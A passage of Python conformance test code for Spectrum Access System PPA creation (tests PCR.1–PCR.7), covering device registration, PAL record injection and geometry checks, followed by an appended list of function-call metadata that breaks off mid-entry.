if not os.path.exists(ppa_zone_data_dir_path):
os.makedirs(ppa_zone_data_dir_path)
with open(ppa_zone_data_file_path, 'w') as file_handle:
file_handle.write(
json.dumps(uut_ppa_zone_data['zone'], indent=2, sort_keys=False,
separators=(',', ': ')))
# Check if the PPA generated by the SAS UUT is fully contained within the
# service area.
logging.debug("SAS UUT PPA - retrieved through FAD:%s",
json.dumps(uut_ppa_zone_data, indent=2, sort_keys=False,
separators=(',', ': ')))
logging.debug("Reference model PPA - retrieved through PpaCreationModel:%s",
json.dumps(json.loads(test_harness_ppa_geometry), indent=2,
sort_keys=False,
separators=(',', ': ')))
uut_ppa_geometry = uut_ppa_zone_data['zone']['features'][0]['geometry']
self.assertTrue(isPpaWithinServiceArea(config['palRecords'], uut_ppa_geometry),
msg="PPA Zone is not within service area")
# Check the Equation 8.3.1 in Test Specfification is satisified w.r t
# [n.12, R2-PAL-05]. Check the area of the non-overlapping difference between
# the maximum PPA boundary created by SAS UUT shall be no more than 10% of the area
# of the maximum PPA boundary created by the Reference Model.
self.assertTrue(utils.PolygonsAlmostEqual(test_harness_ppa_geometry,
uut_ppa_geometry))
def generate_PCR_2_default_config(self, filename):
"""Generate the WinnForum configuration for PCR 2."""
# Load PAL records.
pal_record_a = json.load(
open(os.path.join('testcases', 'testdata', 'pal_record_1.json')))
pal_record_b = json.load(
open(os.path.join('testcases', 'testdata', 'pal_record_2.json')))
# Use the FIPS codes of adjacent census tracts.
pal_record_a['fipsCode'] = 20063955100
pal_record_b['fipsCode'] = 20063955200
# Set the PAL frequency.
pal_low_frequency = 3570000000
pal_high_frequency = 3580000000
# Load device info.
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
device_b = json.load(
open(os.path.join('testcases', 'testdata', 'device_b.json')))
device_c = json.load(
open(os.path.join('testcases', 'testdata', 'device_c.json')))
# Set the same user ID for all devices.
device_b['userId'] = device_a['userId']
device_c['userId'] = device_a['userId']
# Device_a is Category A.
self.assertEqual(device_a['cbsdCategory'], 'A')
# Device_b is Category B with conditionals pre-loaded.
self.assertEqual(device_b['cbsdCategory'], 'B')
# Make PAL record consistent.
pal_records = makePalRecordsConsistent([pal_record_a, pal_record_b],
pal_low_frequency, pal_high_frequency,
device_a['userId'])
# Set the values of CBSD location, antenna gain, and EIRP limit such that a
# single PPA can be formed.
device_a['installationParam']['latitude'], device_a['installationParam'][
'longitude'] = 38.74021, -100.53862
# At least one of the CBSDs is close to the boundary of the Service Area,
# so that -96 dBm/10 MHz protection contour extends beyond the service area boundary.
device_b['installationParam']['latitude'], device_b['installationParam'][
'longitude'] = 38.70645, -100.46034
# placed the device_c in between device_a and device_b within service area.
device_c['installationParam']['latitude'], device_c['installationParam'][
'longitude'] = 38.72281, -100.50103
device_c['installationParam']['heightType'] = 'AGL'
# Set the AntennaGain and EIRP capability in a way that only
# one PPA zone is created by those CBDSs using PPA Creation Reference Model.
device_a['installationParam']['eirpCapability'] = 30
device_b['installationParam']['eirpCapability'] = 47
device_a['installationParam']['antennaGain'] = 16
device_b['installationParam']['antennaGain'] = 16
conditionals_b = {
'cbsdCategory': device_b['cbsdCategory'],
'fccId': device_b['fccId'],
'cbsdSerialNumber': device_b['cbsdSerialNumber'],
'airInterface': device_b['airInterface'],
'installationParam': device_b['installationParam'],
'measCapability': device_b['measCapability']
}
conditionals = [conditionals_b]
del device_b['installationParam']
del device_b['cbsdCategory']
del device_b['airInterface']
del device_b['measCapability']
# Create the actual config.
devices = [device_a, device_b, device_c]
config = {
'registrationRequests': devices,
'conditionalRegistrationData': conditionals,
'palRecords': pal_records,
'sasTestHarnessCert': getCertFilename('sas.cert'),
'sasTestHarnessKey': getCertFilename('sas.key')
}
writeConfig(filename, config)
@configurable_testcase(generate_PCR_2_default_config)
def test_WINNF_FT_S_PCR_2(self, config_filename):
"""Successful Maximum PPA Boundary Creation Clipped by Service Area Boundary.
Checks the maximum PPA boundary, being clipped by the Service Area composed of
one or more adjacent Census Tracts.
Checks PPA generated by SAS UUT shall be fully contained within the service area.
"""
# Load the Config file.
config = loadConfig(config_filename)
# Register devices and check response.
cbsd_ids = self.assertRegistered(config['registrationRequests'],
config['conditionalRegistrationData'])
# Asserts the REG-Conditional value doesn't exist in the registrationRequest,
# it is required to be exist in the registrationRequest data.
assertRegConditionalsForPpaRefModel(config['registrationRequests'],
config['conditionalRegistrationData'])
# Trigger PPA creation to calculate maximum PPA boundary and check if any errors
# encountered in PPA creation reference model.
test_harness_ppa_geometry = ppa.PpaCreationModel(config['registrationRequests'],
config['palRecords'])
# Inject the PAL records.
for pal_record in config['palRecords']:
self._sas_admin.InjectPalDatabaseRecord(pal_record)
# Prepares the PAL Ids to trigger ppa creation request.
pal_ids = [record['palId'] for record in config['palRecords']]
ppa_creation_request = {
"cbsdIds": cbsd_ids,
"palIds": pal_ids
}
# Trigger PPA Creation to SAS UUT.
ppa_id = self.triggerPpaCreationAndWaitUntilComplete(ppa_creation_request)
logging.debug('ppa_id received from SAS UUT:%s', ppa_id)
# Trigger Full Activity Dump and retrieves the PPA Zone record.
uut_ppa_zone_data = self.triggerFadGenerationAndRetrievePpaZone(
ssl_cert=config['sasTestHarnessCert'],
ssl_key=config['sasTestHarnessKey'])
# Check if the PPA generated by the SAS UUT is fully contained within the service area.
logging.debug("SAS UUT PPA - retrieved through FAD:%s",
json.dumps(uut_ppa_zone_data, indent=2, sort_keys=False,
separators=(',', ': ')))
logging.debug("Reference model PPA - retrieved through PpaCreationModel:%s",
json.dumps(json.loads(test_harness_ppa_geometry), indent=2, sort_keys=False,
separators=(',', ': ')))
uut_ppa_geometry = uut_ppa_zone_data['zone']['features'][0]['geometry']
self.assertTrue(isPpaWithinServiceArea(config['palRecords'], uut_ppa_geometry),
msg="PPA Zone is not within service area")
# Check the Equation 8.3.1 in Test Specfification is satisified w.r t
# [n.12, R2-PAL-05]. Check the area of the non-overlapping difference between
# the maximum PPA boundary created by SAS UUT shall be no more than 10% of the area
# of the maximum PPA boundary created by the Reference Model.
self.assertTrue(utils.PolygonsAlmostEqual(test_harness_ppa_geometry,
uut_ppa_geometry))
def generate_PCR_3_default_config(self, filename):
"""Generate the WinnForum configuration for PCR 3."""
# File path where SAS UUT claimed ppa boundary generated in PCR.1 test.
pcr_1_test_config_file_path = os.path.join('testcases', 'configs',
'test_WINNF_FT_S_PCR_1',
'default.config')
sas_uut_claimed_ppa_boundary_file_path = getSasUutClaimedPpaBoundaryFilePath(
'default.config')
# SAS UUT claimed ppa boundary generated in PCR.1 test.
try:
with open(sas_uut_claimed_ppa_boundary_file_path, 'r') as claimed_ppa_file:
user_claimed_ppa_contour = json.load(claimed_ppa_file)
except IOError:
raise RuntimeError('ConfigError:There is an error in reading path:%s \n\n'
% sas_uut_claimed_ppa_boundary_file_path)
# Shrink the user claimed ppa boundary by approximately 1 kilometer.
user_claimed_ppa_contour_feature_collection = utils.InsureFeatureCollection(
utils.ShrinkAndCleanPolygon(
user_claimed_ppa_contour['features'][0]['geometry'], 1e-2),
as_dict=True)
# Create the actual config
config = {
'configPCR_1': pcr_1_test_config_file_path,
'userClaimedPpaContour': user_claimed_ppa_contour_feature_collection
}
writeConfig(filename, config)
@configurable_testcase(generate_PCR_3_default_config)
def test_WINNF_FT_S_PCR_3(self, config_filename):
"""Successful PPA Confirmation with Claimed Boundary by PAL Holder.
Checks PPA generated by SAS UUT shall be fully contained within the service area.
Checks SAS UUT shall confirm a valid PPA boundary claimed by the PAL holder,
composed of one or more adjacent Census Tracts.
"""
# Load the Config file.
config = loadConfig(config_filename)
# Load the test_WINNF_FT_S_PCR_1 config. All other inputs must be identical
# to those used in the corresponding configuration of PCR.1.
pcr_1_test_config = loadConfig(config['configPCR_1'])
# Inject the PAL records.
for pal_record in pcr_1_test_config['palRecords']:
self._sas_admin.InjectPalDatabaseRecord(pal_record)
# Register devices and check the response.
cbsd_ids = self.assertRegistered(pcr_1_test_config['registrationRequests'],
pcr_1_test_config['conditionalRegistrationData'])
# Prepares the PAL Ids to trigger ppa creation request.
pal_ids = [record['palId'] for record in pcr_1_test_config['palRecords']]
# Create PPA creation request with user claimed ppa contour.
ppa_creation_request = {
"cbsdIds": cbsd_ids,
"palIds": pal_ids,
"providedContour": config['userClaimedPpaContour']
}
# Trigger PPA Creation to SAS UUT.
ppa_id = self.triggerPpaCreationAndWaitUntilComplete(ppa_creation_request)
logging.debug('ppa_id received from SAS UUT:%s', ppa_id)
# Trigger Full Activity Dump and retrieves the PPA Zone record.
uut_ppa_zone_data = self.triggerFadGenerationAndRetrievePpaZone(
ssl_cert=pcr_1_test_config['sasTestHarnessCert'],
ssl_key=pcr_1_test_config['sasTestHarnessKey'])
# Check if the PPA generated by the SAS UUT is fully contained within the service area.
logging.debug("SAS UUT PPA - retrieved through FAD:%s",
json.dumps(uut_ppa_zone_data, indent=2, sort_keys=False,
separators=(',', ': ')))
logging.debug("User claimed PPA boundary:%s",
json.dumps(config['userClaimedPpaContour'], indent=2, sort_keys=False,
separators=(',', ': ')))
uut_ppa_geometry = uut_ppa_zone_data['zone']['features'][0]['geometry']
self.assertTrue(isPpaWithinServiceArea(pcr_1_test_config['palRecords'], uut_ppa_geometry),
msg="PPA Zone is not within service area")
# Check the maximum PPA boundary created by SAS UUT is identical with the maximum
# PPA claimed boundary.
test_harness_ppa_geometry = config['userClaimedPpaContour']['features'][0]['geometry']
self.assertTrue(utils.PolygonsAlmostEqual(test_harness_ppa_geometry, uut_ppa_geometry))
def generate_PCR_4_default_config(self, filename):
"""Generate the WinnForum configuration for PCR 4."""
# Load PAL records.
pal_record_1 = json.load(
open(os.path.join('testcases', 'testdata', 'pal_record_1.json')))
pal_record_2 = json.load(
open(os.path.join('testcases', 'testdata', 'pal_record_2.json')))
# Use the FIPS codes of adjacent census tracts.
pal_record_1['fipsCode'] = 20063955100
pal_record_2['fipsCode'] = 20063955200
# Set the PAL frequency.
pal_low_frequency = 3570000000
pal_high_frequency = 3580000000
# Load device info.
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
device_b = json.load(
open(os.path.join('testcases', 'testdata', 'device_b.json')))
device_c = json.load(
open(os.path.join('testcases', 'testdata', 'device_c.json')))
# Set the same user ID for all devices
device_b['userId'] = device_a['userId']
device_c['userId'] = device_a['userId']
# Make PAL records consistent.
pal_records = makePalRecordsConsistent([pal_record_1, pal_record_2],
pal_low_frequency, pal_high_frequency,
device_a['userId'])
# Set the values of CBSD location, antenna gain, and EIRP limit such that a
# single PPA can be formed.
device_a['installationParam']['latitude'], device_a['installationParam'][
'longitude'] = 39.0373, -100.4184
device_b['installationParam']['latitude'], device_b['installationParam'][
'longitude'] = 39.0378, -100.4785
# At least one of the CBSDs is located outside the service area.
device_c['installationParam']['latitude'], device_c['installationParam'][
'longitude'] = 39.09755, -99.9179
device_c['installationParam']['heightType'] = 'AGL'
# Set the AntennaGain and EIRP capability chosen in a way that only one PPA zone is created
# by those CBDSs
device_a['installationParam']['eirpCapability'] = 30
device_b['installationParam']['eirpCapability'] = 47
device_c['installationParam']['eirpCapability'] = 30
device_a['installationParam']['antennaGain'] = 16
device_b['installationParam']['antennaGain'] = 16
device_c['installationParam']['antennaGain'] = 16
conditionals_b = {
'cbsdCategory': device_b['cbsdCategory'],
'fccId': device_b['fccId'],
'cbsdSerialNumber': device_b['cbsdSerialNumber'],
'airInterface': device_b['airInterface'],
'installationParam': device_b['installationParam'],
'measCapability': device_b['measCapability']
}
conditionals = [conditionals_b]
del device_b['installationParam']
del device_b['cbsdCategory']
del device_b['airInterface']
del device_b['measCapability']
# Create the actual config.
devices = [device_a, device_b, device_c]
config = {
'registrationRequests': devices,
'conditionalRegistrationData': conditionals,
'palRecords': pal_records
}
writeConfig(filename, config)
@configurable_testcase(generate_PCR_4_default_config)
def test_WINNF_FT_S_PCR_4(self, config_filename):
"""Unsuccessful PPA Creation with one or more CBSDs Outside Service Area.
Checks SAS UUT rejects creation of a PPA boundary if at least one of the CBSDs
included in the CBSD cluster list is located outside PAL holder service area.
"""
# Load the Config file.
config = loadConfig(config_filename)
# Inject the PAL records.
for pal_record in config['palRecords']:
self._sas_admin.InjectPalDatabaseRecord(pal_record)
# Register devices and check the response.
cbsd_ids = self.assertRegistered(config['registrationRequests'],
config['conditionalRegistrationData'])
# Prepares the PAL Ids to trigger ppa creation request.
pal_ids = [record['palId'] for record in config['palRecords']]
# Create PPA creation request to SAS UUT.
ppa_creation_request = {
"cbsdIds": cbsd_ids,
"palIds": pal_ids
}
# Trigger PPA Creation to SAS UUT and expect the failure response.
self.assertPpaCreationFailure(ppa_creation_request)
def generate_PCR_5_default_config(self, filename):
"""Generate the WinnForum configuration for PCR 5."""
# Load PAL records.
pal_record_1 = json.load(
open(os.path.join('testcases', 'testdata', 'pal_record_1.json')))
pal_record_2 = json.load(
open(os.path.join('testcases', 'testdata', 'pal_record_2.json')))
# Use the FIPS codes of adjacent census tracts.
pal_record_1['fipsCode'] = 20063955100
pal_record_2['fipsCode'] = 20063955200
# Set the PAL frequency.
pal_low_frequency = 3570000000
pal_high_frequency = 3580000000
# Load device info.
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
device_b = json.load(
open(os.path.join('testcases', 'testdata', 'device_b.json')))
# light check to ensure CBSD userId is not same.
self.assertNotEqual(device_a['userId'], device_b['userId'])
# The userId of at least one of the CBSDs is not associated to the userId of
# the PAL Holder configured in the PAL record for this service area.
pal_records = makePalRecordsConsistent([pal_record_1, pal_record_2], pal_low_frequency,
pal_high_frequency,
device_a['userId'])
# CBSDs are located inside the service area.
device_a['installationParam']['latitude'], device_a['installationParam'][
'longitude'] = 39.0373, -100.4184
device_b['installationParam']['latitude'], device_b['installationParam'][
'longitude'] = 39.0378, -100.4785
conditionals_b = {
'cbsdCategory': device_b['cbsdCategory'],
'fccId': device_b['fccId'],
'cbsdSerialNumber': device_b['cbsdSerialNumber'],
'airInterface': device_b['airInterface'],
'installationParam': device_b['installationParam'],
'measCapability': device_b['measCapability']
}
conditionals = [conditionals_b]
del device_b['installationParam']
del device_b['cbsdCategory']
del device_b['airInterface']
del device_b['measCapability']
# Create the actual config.
devices = [device_a, device_b]
config = {
'registrationRequests': devices,
'conditionalRegistrationData': conditionals,
'palRecords': pal_records
}
writeConfig(filename, config)
@configurable_testcase(generate_PCR_5_default_config)
def test_WINNF_FT_S_PCR_5(self, config_filename):
"""Unsuccessful PPA Creation with one or more CBSDs Outside Service Area.
Checks SAS UUT rejects creation of a PPA boundary if at least one of
the CBSDs included in the CBSD cluster list does not belong to the PAL holder.
"""
# Load the Config file.
config = loadConfig(config_filename)
# Inject the PAL records.
for pal_record in config['palRecords']:
self._sas_admin.InjectPalDatabaseRecord(pal_record)
# Register devices and check the response.
cbsd_ids = self.assertRegistered(config['registrationRequests'],
config['conditionalRegistrationData'])
# Prepares the PAL Ids to trigger ppa creation request.
pal_ids = [record['palId'] for record in config['palRecords']]
# Create PPA creation request to SAS UUT.
ppa_creation_request = {
"cbsdIds": cbsd_ids,
"palIds": pal_ids
}
# Trigger PPA Creation to SAS UUT and expect the failure response.
# SAS does not create a PPA and generates an error.
self.assertPpaCreationFailure(ppa_creation_request)
def generate_PCR_6_default_config(self, filename):
"""Generate the WinnForum configuration for PCR 6."""
# File path where SAS UUT claimed ppa boundary generated in PCR.1 test
pcr_1_test_config_file_path = os.path.join('testcases', 'configs',
'test_WINNF_FT_S_PCR_1',
'default.config')
sas_uut_claimed_ppa_boundary_file_path = getSasUutClaimedPpaBoundaryFilePath(
'default.config')
# Load SAS UUT claimed ppa boundary and check if any error while retrieving
# SAS UUT claimed ppa boundary generated in PCR.1 test.
try:
with open(sas_uut_claimed_ppa_boundary_file_path, 'r') as claimed_ppa_file:
user_claimed_ppa_contour = json.load(claimed_ppa_file)
except IOError:
raise RuntimeError('ConfigError:There is an error in reading path:%s \n\n'
% sas_uut_claimed_ppa_boundary_file_path)
# Expand the user claimed ppa boundary by approximately 1 kilometer.
user_claimed_ppa_contour_feature_collection = utils.InsureFeatureCollection(
utils.ShrinkAndCleanPolygon(
user_claimed_ppa_contour['features'][0]['geometry'], -1e-2),
as_dict=True)
# Create the actual config.
config = {
'configPCR_1': pcr_1_test_config_file_path,
'userClaimedPpaContour': user_claimed_ppa_contour_feature_collection
}
writeConfig(filename, config)
@configurable_testcase(generate_PCR_6_default_config)
def test_WINNF_FT_S_PCR_6(self, config_filename):
"""Unsuccessful PPA boundary Claimed by PAL Holder Not contained within Maximum PPA Boundary.
SAS UUT shall reject a PPA boundary claimed by the PAL holder,
that is not fully contained within the maximum PPA boundary created by SAS UUT.
"""
# Load the Config file.
config = loadConfig(config_filename)
# Load the test_WINNF_FT_S_PCR_1 config. All other inputs must be identical
# to those used in the corresponding configuration of PCR.1.
pcr_1_test_config = loadConfig(config['configPCR_1'])
# Inject the PAL records.
for pal_record in pcr_1_test_config['palRecords']:
self._sas_admin.InjectPalDatabaseRecord(pal_record)
# Register devices and check response.
cbsd_ids = self.assertRegistered(pcr_1_test_config['registrationRequests'],
pcr_1_test_config['conditionalRegistrationData'])
# Prepares the PAL Ids to trigger ppa creation request.
pal_ids = [record['palId'] for record in pcr_1_test_config['palRecords']]
# Create PPA creation request with user claimed ppa contour.
ppa_creation_request = {
"cbsdIds": cbsd_ids,
"palIds": pal_ids,
"providedContour": config['userClaimedPpaContour']
}
# Trigger PPA Creation to SAS UUT.
self.assertPpaCreationFailure(ppa_creation_request)
def generate_PCR_7_default_config(self, filename):
"""Generate the WinnForum configuration for PCR 7."""
# File path where SAS UUT claimed ppa boundary generated in PCR.1 test
pcr_1_test_config_file_path = os.path.join('testcases', 'configs',
'test_WINNF_FT_S_PCR_1',
'default.config')
sas_uut_claimed_ppa_boundary_file_path = getSasUutClaimedPpaBoundaryFilePath(
'default.config')
# Load SAS UUT claimed ppa boundary and check if any error while retrieving
# SAS UUT claimed ppa boundary generated in PCR.1 test.
try:
with open(sas_uut_claimed_ppa_boundary_file_path, 'r') as overlapped_ppa_file:
overlapping_ppa_contour = json.load(overlapped_ppa_file)
except IOError:
raise RuntimeError('ConfigError:There is an error in reading path:%s \n\n'
% sas_uut_claimed_ppa_boundary_file_path)
# Shrink the user claimed ppa boundary by approximately 1 kilometer.
overlapping_ppa_contour_geometry = utils.ShrinkAndCleanPolygon(
overlapping_ppa_contour['features'][0]['geometry'], 1e-2)
# Create ppa_record where user claimed PPA contour will be replaced.
overlapping_ppa_record = json.load(
open(os.path.join('testcases', 'testdata', 'ppa_record_0.json')))
# Update the user_claimed ppa contour geometry required for overlaps ppa.
overlapping_ppa_record['zone'] = {'type':'FeatureCollection',
'features': [
{'type': 'Feature',
'properties': {},
'geometry': overlapping_ppa_contour_geometry}
]}
# Load PCR.1 configuration.
pcr_1_test_config = loadConfig(pcr_1_test_config_file_path)
# Set the pal_record used in PCR.1 tests.
pcr_1_pal_records = pcr_1_test_config['palRecords']
#updating the PPA record based on the PAL records
overlapping_ppa_record ['ppaInfo']['palId'] = [pal['palId'] for pal in pcr_1_pal_records]
overlapping_ppa_record ['id'] = 'zone/ppa/%s/%s/%s' % (overlapping_ppa_record['creator'],
overlapping_ppa_record['ppaInfo']['palId'][0],
uuid.uuid4().hex)
overlapping_ppa_record ['ppaInfo']['ppaBeginDate'] = pcr_1_pal_records[0]['license']['licenseDate']
overlapping_ppa_record ['ppaInfo']['ppaExpirationDate'] = pcr_1_pal_records[0]['license']['licenseExpiration']
# Create the actual config.
config = {
'configPCR_1': pcr_1_test_config_file_path,
'overlapPpaRecord': overlapping_ppa_record
}
writeConfig(filename, config)
@configurable_testcase(generate_PCR_7_default_config)
def test_WINNF_FT_S_PCR_7(self, config_filename):
"""Overlapping PPA Boundaries.
Checks SAS UUT shall doesnt create PPA zone within the service area.
Checks SAS UUT shall confirm a valid PPA boundary claimed by the PAL holder,
composed of one or more adjacent Census Tracts was overlapped by another
PPA zone.
"""
# Load the Config file.
config = loadConfig(config_filename)
# Load the test_WINNF_FT_S_PCR_1 config. All other inputs must be identical
# to those used in the corresponding configuration of PCR.1.
pcr_1_test_config = loadConfig(config['configPCR_1'])
# Inject the PAL records.
for pal_record in pcr_1_test_config['palRecords']:
self._sas_admin.InjectPalDatabaseRecord(pal_record)
# Inject the overlap ppa zone into SAS UUT.
zone_id = self._sas_admin.InjectZoneData({'record': config['overlapPpaRecord']})
self.assertTrue(zone_id)
# Register devices and check the response.
cbsd_ids = self.assertRegistered(pcr_1_test_config['registrationRequests'],
pcr_1_test_config['conditionalRegistrationData'])
# Prepares the PAL Ids to trigger ppa creation request.
pal_ids = [record['palId'] for record in pcr_1_test_config['palRecords']]
# Create PPA creation request with device which is already part of
# existing PPA zone.
ppa_creation_request = {
"cbsdIds": cbsd_ids,
"palIds": pal_ids
}
# Trigger PPA Creation to SAS UUT and check SAS UUT should not create PPA boundary
# claimed by PAL holder was overlapped by PPA zone.
self.assertPpaCreationFailure(ppa_creation_request)
|
[
"util.configurable_testcase",
"json.dumps",
"reference_models.geo.utils.ShrinkAndCleanPolygon",
"reference_models.geo.utils.PolygonsAlmostEqual",
"os.path.join",
"json.loads",
"util.getCertificateFingerprint",
"os.path.dirname",
"os.path.exists",
"util.loadConfig",
"util.getCertFilename",
"reference_models.ppa.ppa.PpaCreationModel",
"reference_models.geo.drive.census_tract_driver.GetCensusTract",
"util.writeConfig",
"shapely.ops.cascaded_union",
"full_activity_dump_helper.getFullActivityDumpSasUut",
"reference_models.geo.utils.ToShapely",
"util.makePalRecordsConsistent",
"json.load",
"logging.debug",
"os.makedirs",
"uuid.uuid4"
] |
[((1789, 1849), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""output"""', '"""test_WINNF_FT_S_PCR_1"""'], {}), "('testcases', 'output', 'test_WINNF_FT_S_PCR_1')\n", (1801, 1849), False, 'import os\n'), ((2036, 2097), 'os.path.join', 'os.path.join', (['ppa_zone_data_dir_path', 'ppa_zone_data_file_name'], {}), '(ppa_zone_data_dir_path, ppa_zone_data_file_name)\n', (2048, 2097), False, 'import os\n'), ((3152, 3193), 'shapely.ops.cascaded_union', 'ops.cascaded_union', (['census_tracts_for_pal'], {}), '(census_tracts_for_pal)\n', (3170, 3193), False, 'from shapely import ops\n'), ((3275, 3309), 'reference_models.geo.utils.ToShapely', 'utils.ToShapely', (['ppa_zone_geometry'], {}), '(ppa_zone_geometry)\n', (3290, 3309), False, 'from reference_models.geo import drive, utils\n'), ((10876, 10928), 'util.configurable_testcase', 'configurable_testcase', (['generate_PCR_1_default_config'], {}), '(generate_PCR_1_default_config)\n', (10897, 10928), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((18475, 18527), 'util.configurable_testcase', 'configurable_testcase', (['generate_PCR_2_default_config'], {}), '(generate_PCR_2_default_config)\n', (18496, 18527), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((23074, 23126), 'util.configurable_testcase', 'configurable_testcase', (['generate_PCR_3_default_config'], {}), '(generate_PCR_3_default_config)\n', (23095, 23126), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((29018, 29070), 'util.configurable_testcase', 'configurable_testcase', (['generate_PCR_4_default_config'], {}), '(generate_PCR_4_default_config)\n', (29039, 29070), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((32512, 32564), 'util.configurable_testcase', 'configurable_testcase', (['generate_PCR_5_default_config'], {}), '(generate_PCR_5_default_config)\n', (32533, 32564), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((35178, 35230), 'util.configurable_testcase', 'configurable_testcase', (['generate_PCR_6_default_config'], {}), '(generate_PCR_6_default_config)\n', (35199, 35230), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((39481, 39533), 'util.configurable_testcase', 'configurable_testcase', (['generate_PCR_7_default_config'], {}), '(generate_PCR_7_default_config)\n', (39502, 39533), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((6841, 6876), 'util.getCertificateFingerprint', 'getCertificateFingerprint', (['ssl_cert'], {}), '(ssl_cert)\n', (6866, 6876), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((7226, 7298), 'full_activity_dump_helper.getFullActivityDumpSasUut', 'getFullActivityDumpSasUut', (['self._sas', 'self._sas_admin', 'ssl_cert', 'ssl_key'], {}), '(self._sas, self._sas_admin, ssl_cert, ssl_key)\n', (7251, 7298), False, 'from full_activity_dump_helper import getFullActivityDumpSasUut\n'), ((8950, 9067), 'util.makePalRecordsConsistent', 'makePalRecordsConsistent', (['[pal_record_a, pal_record_b]', 'pal_low_frequency', 'pal_high_frequency', "device_a['userId']"], {}), "([pal_record_a, pal_record_b], pal_low_frequency,\n pal_high_frequency, device_a['userId'])\n", (8974, 9067), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((10842, 10871), 'util.writeConfig', 'writeConfig', (['filename', 'config'], {}), '(filename, config)\n', (10853, 10871), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((11156, 11183), 'util.loadConfig', 'loadConfig', (['config_filename'], {}), '(config_filename)\n', (11166, 11183), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((12156, 12230), 'reference_models.ppa.ppa.PpaCreationModel', 'ppa.PpaCreationModel', (["config['registrationRequests']", "config['palRecords']"], {}), "(config['registrationRequests'], config['palRecords'])\n", (12176, 12230), False, 'from reference_models.ppa import ppa\n'), ((12746, 12802), 'logging.debug', 'logging.debug', (['"""ppa_id received from SAS UUT:%s"""', 'ppa_id'], {}), "('ppa_id received from SAS UUT:%s', ppa_id)\n", (12759, 12802), False, 'import logging\n'), ((13390, 13430), 'os.path.dirname', 'os.path.dirname', (['ppa_zone_data_file_path'], {}), '(ppa_zone_data_file_path)\n', (13405, 13430), False, 'import os\n'), ((16228, 16345), 'util.makePalRecordsConsistent', 'makePalRecordsConsistent', (['[pal_record_a, pal_record_b]', 'pal_low_frequency', 'pal_high_frequency', "device_a['userId']"], {}), "([pal_record_a, pal_record_b], pal_low_frequency,\n pal_high_frequency, device_a['userId'])\n", (16252, 16345), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((18441, 18470), 'util.writeConfig', 'writeConfig', (['filename', 'config'], {}), '(filename, config)\n', (18452, 18470), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((18921, 18948), 'util.loadConfig', 'loadConfig', (['config_filename'], {}), '(config_filename)\n', (18931, 18948), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((19608, 19682), 'reference_models.ppa.ppa.PpaCreationModel', 'ppa.PpaCreationModel', (["config['registrationRequests']", "config['palRecords']"], {}), "(config['registrationRequests'], config['palRecords'])\n", (19628, 19682), False, 'from reference_models.ppa import ppa\n'), ((20210, 20266), 'logging.debug', 'logging.debug', (['"""ppa_id received from SAS UUT:%s"""', 'ppa_id'], {}), "('ppa_id received from SAS UUT:%s', ppa_id)\n", (20223, 20266), False, 'import logging\n'), ((21904, 21983), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""configs"""', '"""test_WINNF_FT_S_PCR_1"""', '"""default.config"""'], {}), "('testcases', 'configs', 'test_WINNF_FT_S_PCR_1', 'default.config')\n", (21916, 21983), False, 'import os\n'), ((23040, 23069), 'util.writeConfig', 'writeConfig', (['filename', 'config'], {}), '(filename, config)\n', (23051, 23069), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((23520, 23547), 'util.loadConfig', 'loadConfig', (['config_filename'], {}), '(config_filename)\n', (23530, 23547), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((23718, 23751), 'util.loadConfig', 'loadConfig', (["config['configPCR_1']"], {}), "(config['configPCR_1'])\n", (23728, 23751), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((24592, 24648), 'logging.debug', 'logging.debug', (['"""ppa_id received from SAS UUT:%s"""', 'ppa_id'], {}), "('ppa_id received from SAS UUT:%s', ppa_id)\n", (24605, 24648), False, 'import logging\n'), ((26991, 27108), 'util.makePalRecordsConsistent', 'makePalRecordsConsistent', (['[pal_record_1, pal_record_2]', 'pal_low_frequency', 'pal_high_frequency', "device_a['userId']"], {}), "([pal_record_1, 